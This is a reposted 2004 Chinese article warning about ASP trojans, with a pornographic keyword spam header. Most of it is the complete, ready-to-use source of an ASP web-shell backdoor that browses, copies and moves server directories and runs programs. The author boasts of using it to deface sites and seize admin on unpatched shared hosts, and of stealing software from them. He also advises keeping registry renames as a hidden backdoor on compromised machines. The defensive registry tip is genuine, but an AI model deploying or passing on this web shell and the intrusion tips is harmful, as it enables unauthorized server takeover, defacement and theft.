久久―日本道色综合久久,亚洲欧美精品在线,狼狼色丁香久久婷婷综合五月,香蕉人人超,日本网站黄,国产在线观看不卡免费高清,无遮挡的毛片免费

2023信創(chuàng)獨角獸企業(yè)100強
全世界各行各業(yè)聯(lián)合起來,internet一定要實現(xiàn)!

注意防范ASP編寫的木馬程序

2004-02-17 eNet&Ciweek

  接下來讓我們再來看下一款A(yù)SP后門木馬程序的代碼:

  <%response.write "一次只能執(zhí)行一個xx作" %>

  <%response.write now()%>
程序所在的物理路徑:

  <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>

  

  asp's shell.application backdoor

  

  
" method="POST">

   輸入要瀏覽的目錄


  

  copy

  


  

  move

  


  路徑:

  程序:


  

  


  

  

  <%

  szCMD = Request.Form("text") '目錄瀏覽

  if (szCMD <> "") then

  set shell=server.createobject("shell.application") '建立shell對象

  set fod1=shell.namespace(szcmd)

  set foditems=fod1.items

  for each co in foditems

  response.write "" & co.path & "-----" & co.size & "
"

  next

  end if

  %>

  <%

  szCMD1 = Request.Form("text1") '目錄拷貝,不能進行文件拷貝

  szCMD2 = Request.Form("text2")

  if szcmd1<>"" and szcmd2<>"" then

  set shell1=server.createobject("shell.application") '建立shell對象

  set fod1=shell1.namespace(szcmd2)

  for i=len(szcmd1) to 1 step -1

  if mid(szcmd1,i,1)="\" then

  path=left(szcmd1,i-1)

  exit for

  end if

  next

  if len(path)=2 then path=path & "\"

  path2=right(szcmd1,len(szcmd1)-i)

  set fod2=shell1.namespace(path)

  set foditem=fod2.parsename(path2)

  fod1.copyhere foditem

  response.write "command completed success!"

  end if

  %>

  <%

  szCMD3 = Request.Form("text3") '目錄移動

  szCMD4 = Request.Form("text4")

  if szcmd3<>"" and szcmd4<>"" then

  set shell2=server.createobject("shell.application") '建立shell對象

  set fod1=shell2.namespace(szcmd4)

  for i=len(szcmd3) to 1 step -1

  if mid(szcmd3,i,1)="\" then

  path=left(szcmd3,i-1)

  exit for

  end if

  next

  if len(path)=2 then path=path & "\"

  path2=right(szcmd3,len(szcmd3)-i)

  set fod2=shell2.namespace(path)

  set foditem=fod2.parsename(path2)

  fod1.movehere foditem

  response.write "command completed success!"

  end if

  %>

  <%

  szCMD5 = Request.Form("text5") '執(zhí)行程序要指定路徑

  szCMD6 = Request.Form("text6")

  if szcmd5<>"" and szcmd6<>"" then

  set shell3=server.createobject("shell.application") '建立shell對象

  shell3.namespace(szcmd5).items.item(szcmd6).invokeverb

  response.write "command completed success!"

  end if

  %>

  執(zhí)行后如下圖:

  要查看目錄,只要輸入相應(yīng)的目錄,點發(fā)送命令就可以了。如下圖:

  這個木馬程可以完成文件的COPY、MOVE,和執(zhí)行程序。但很多命令都不能用,例如:del、net、netstat等。這個木馬程的功能隨然簡單,但是用它來黑一個網(wǎng)站是足夠了。比如,我們可以把網(wǎng)站的首頁MOVE到其它地方,然后我們再COPY一個同名的黑客網(wǎng)頁進去,就行了。

  最要命的是這個木馬適用于任何虛擬主機之中,也就是說我只要是服務(wù)器中的一個虛擬空間的用戶,我就可以傳這個木馬上去,并用它來修改其它任何用戶的主頁。所以如果哪些提供虛擬空間的服務(wù)商沒有打補丁的話,那真是死定了。

  然而在我的實踐中發(fā)現(xiàn),中國很多的虛擬空間服務(wù)商,特別是一些小型的服務(wù)商都沒有打補丁。我利用這一漏洞拿到了很多虛擬空間服務(wù)器的ADMIN,然后好心的幫他們補上漏洞。當然我也得到了我想得到的東西——很多好的軟件和代碼。我現(xiàn)在用著的很多ASP程序就是從他們那上面偷下來,太難聽了,應(yīng)該說DOWN下來的才對。

  言歸正傳,我們應(yīng)該怎樣來防范這個ASP后門木馬程序呢?讓我們看一下它其中的這一句代碼:set shell=server.createobject("shell.application"),跟剛才的方法一樣,如下圖:

  

  我們只要把"shell.application"項和"shell.application.1"項改名或刪除就可以了。記住了,如果是改名,要改得復(fù)雜一點,不要讓黑客們一下就猜到了。順便說一句,如果是你給肉雞打補丁最好是改名,并把名字記下來,這樣也就成為自己一個隱密的后門了。

  最后對這兩款A(yù)SP木馬后門,以及如何防范ASP木馬后門做一下總結(jié):第一款木馬功能上強大一些, 但適用范圍窄,需要FSO支持也就是"Scripting.FileSystemObject"項的支持。第二款木馬雖然功能上少一些,但它創(chuàng)建的是"shell.application"對象。在任何虛擬主機中都適用。(這一點危害確實太大了,提供支持ASP空間的管理員們,你們可得注意了?。?

  其實跟據(jù)對上面兩款A(yù)SP木馬后門的防范,大家可能已經(jīng)想到了,對于ASP后門木馬的防范,我們只要在注冊表中把"shell.application"、"WSCRIPT.SHELL"等危險的腳本對象(因為它們都是用于創(chuàng)建腳本命令通道的)進行改名或刪除,也就是限制系統(tǒng)對“腳本SHELL”的創(chuàng)建,ASP木馬也就成為無本之木、無米之炊,運行不起來了。

  注:以上代碼復(fù)制保存為ASP文件就可以直接使用了。(僅用于測試,不要搞破壞,后果自負?。?

  

相關(guān)頻道: eNews

您對本文或本站有任何意見,請在下方提交,謝謝!

投稿信箱:tougao@enet16.com